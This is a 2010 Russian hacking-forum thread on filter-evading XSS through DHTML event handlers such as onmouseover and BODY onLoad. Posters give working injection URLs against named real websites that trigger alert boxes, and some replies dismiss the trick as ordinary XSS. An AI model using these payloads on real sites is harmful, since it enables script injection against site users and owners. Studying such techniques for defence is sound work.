Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   DHTML inj (XSS) (https://forum.antichat.xyz/showthread.php?t=237653)

Bo0oM 25.10.2010 19:24
Чисто для общего развития.

Не многие знают об этой уязвимости, действует как пассивная или активная XSS при работе с DHTML (динамическим html), реагирует на одно из событий, например onMouseOver - возникает при наведении курсора мыши на элемент, подверженный уязвимости. (другие события DHTML и примеры их использования тут)

Полезно при фильтрации символов ">" и "[B]XSS не проёдет

Примеры формирования (алерт при наведении мыши на текст):

Код:
Code:
http://javagala.ru/dwnld/index.php/" onmouseover=alert() bad="
Код:
Code:
http://javagala.ru/dwnld/index.php/"onmouseover=alert()%3E
После детального изучения выяснилось, что большое количество сайтов подвержено данной уязвимости.

Вот так вот...

Isis 25.10.2010 22:21
О чем "статья" ?

ok-man 25.10.2010 23:12
это обычный хсс, в каждой статье о пробиве фильтров говорится

<Cyber-punk> 30.10.2010 02:11
Цитата:
Сообщение от None
http://bookz.ru/dl2.php?id=12306&e=%20'';!--%22%3CBODY%20onLoad=%22javascript:window.alert('ha cked')%22%3E=&{()}&t=z&g=&f=pushki54&a_id=1193
Аналогично!

Но можно проще:

Цитата:
Сообщение от None
http://javagala.ru/dwnld/index.php/%22;!--%22%3CBODY%20onLoad=%22javascript:window.alert('ha cked')%22%3E=&%7B()%7D


Время: 21:36